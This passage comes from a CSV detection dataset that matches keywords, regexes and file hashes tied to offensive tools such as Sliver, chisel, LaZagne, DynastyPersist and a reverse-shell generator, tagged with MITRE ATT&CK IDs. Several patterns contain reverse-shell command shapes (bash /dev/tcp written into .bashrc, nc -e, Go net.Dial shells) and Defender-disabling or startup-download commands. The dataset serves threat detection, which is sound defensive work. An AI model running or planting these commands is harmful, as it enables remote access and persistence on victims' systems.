hakrevdns*",".{0,1000}echo\s\'8\.8\.8\.8\'\s\|\shakrevdns.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*echo bitsadmin /transfer Packages /download /priority foreground %a% ""%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Winupdate.exe*",".{0,1000}echo\sbitsadmin\s\/transfer\sPackages\s\/download\s\/priority\sforeground\s\%a\%\s\""\%USERPROFILE\%\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\Winupdate\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*echo 'find cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'find\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*echo 'import os'*echo*os.system(""nc -e sh*'* > /tmp/*",".{0,1000}echo\s\'import\sos\'.{0,1000}echo.{0,1000}os\.system\(\""nc\s\-e\ssh.{0,1000}\'.{0,1000}\s\>\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo -n 'cmd /c start rundll32 *.dll* | base64*",".{0,1000}echo\s\-n\s\'cmd\s\/c\sstart\srundll32\s.{0,1000}\.dll.{0,1000}\s\|\sbase64.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Generate EncodedCommand","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""/bin/bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""/bin/sh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/sh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""cmd"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""cmd\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""powershell"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""powershell\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""pwsh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""pwsh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""sh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""sh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""zsh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""zsh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'PEzor!!*",".{0,1000}echo\s\'PEzor!!.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*echo powershell -command ""start Winupdate.exe"" >>*.bat*",".{0,1000}echo\spowershell\s\-command\s\""start\sWinupdate\.exe\""\s\>\>.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*echo UAC.ShellExecute *cmd.exe*",".{0,1000}echo\sUAC\.ShellExecute\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*echoac-poc-main*",".{0,1000}echoac\-poc\-main.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*echowrecker*",".{0,1000}echowrecker.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ecryptfs2john.py*",".{0,1000}ecryptfs2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ecs_task_def_data/all_task_def.txt*",".{0,1000}ecs_task_def_data\/all_task_def\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*ed09e2c53b898d79b81b5aa96dfc9b5ed696b34491eef7b5fefe9fb7ed1cbaaa*",".{0,1000}ed09e2c53b898d79b81b5aa96dfc9b5ed696b34491eef7b5fefe9fb7ed1cbaaa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ed0e2694b307d3510c102a4a5687523d0c72b8efba9dc256f493555639a3d470*",".{0,1000}ed0e2694b307d3510c102a4a5687523d0c72b8efba9dc256f493555639a3d470.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ed0ee202bacea249b3d4563c0262501587434b25fc8b754c17829c8f4a64ad84*",".{0,1000}ed0ee202bacea249b3d4563c0262501587434b25fc8b754c17829c8f4a64ad84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Ed1s0nZ/cool/*",".{0,1000}Ed1s0nZ\/cool\/.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56*",".{0,1000}ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*ed3e2cf7fe3797b0ec87b74568628f8a4d7ac1c4c5a29c6e169599ded4d1d947*",".{0,1000}ed3e2cf7fe3797b0ec87b74568628f8a4d7ac1c4c5a29c6e169599ded4d1d947.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ed4d66eac260c54457ea1b9fa50be035dc89b32e7a318bff1296606413f25cbb*",".{0,1000}ed4d66eac260c54457ea1b9fa50be035dc89b32e7a318bff1296606413f25cbb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*ed565cd47f1e75dc1c53043d03631809f64c091293d10fb26f272ff74d419a6d*",".{0,1000}ed565cd47f1e75dc1c53043d03631809f64c091293d10fb26f272ff74d419a6d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ed68e081f359726e140c31e96c92da4aa363a976569f4f9357f73f738d534dd3*",".{0,1000}ed68e081f359726e140c31e96c92da4aa363a976569f4f9357f73f738d534dd3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ed696e567323b56a31408da5f6e12181ae0740bec1b23fc9be2817e51cf13235*",".{0,1000}ed696e567323b56a31408da5f6e12181ae0740bec1b23fc9be2817e51cf13235.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ed72a475f9c8bb454e36a97155172424cd9892cbeba30bb6fc53cad973767fd1*",".{0,1000}ed72a475f9c8bb454e36a97155172424cd9892cbeba30bb6fc53cad973767fd1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ED83E265-D48E-4B0D-8C22-D9D0A67C78F2*",".{0,1000}ED83E265\-D48E\-4B0D\-8C22\-D9D0A67C78F2.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*ed85a47316a693661dd964ef58efb31bbe5ed97d2f9560021a220bbb912a9c2c*",".{0,1000}ed85a47316a693661dd964ef58efb31bbe5ed97d2f9560021a220bbb912a9c2c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ed994cff2f59eddf328e72a6060180b724d931cb9b564327b4a5eab28cb5cc8c*",".{0,1000}ed994cff2f59eddf328e72a6060180b724d931cb9b564327b4a5eab28cb5cc8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ed9d3ee993fe0a36bb7a7fce3940112ea29eccca58165738a758c58a3fe0ae54*",".{0,1000}ed9d3ee993fe0a36bb7a7fce3940112ea29eccca58165738a758c58a3fe0ae54.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*edaa2e28eee643e72776396155001db13f288d9bc64e57057127a09c1d57c9a7*",".{0,1000}edaa2e28eee643e72776396155001db13f288d9bc64e57057127a09c1d57c9a7.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*edcf68c388027b82dc8db46324c2cc67105a90f3689a200972331deb5dcdb887*",".{0,1000}edcf68c388027b82dc8db46324c2cc67105a90f3689a200972331deb5dcdb887.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*eddd8cf62034d52903edacb5d07fc26220597cc98395d200fe859bd88936fc70*",".{0,1000}eddd8cf62034d52903edacb5d07fc26220597cc98395d200fe859bd88936fc70.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*edf46019fc966e2dfebe6209744075f41b8e58dcfe1d8247284e88b240149e35*",".{0,1000}edf46019fc966e2dfebe6209744075f41b8e58dcfe1d8247284e88b240149e35.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*edge_wscript_wsh_injection*",".{0,1000}edge_wscript_wsh_injection.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*edge1.parrot.run*",".{0,1000}edge1\.parrot\.run.{0,1000}","offensive_tool_keyword","parrot 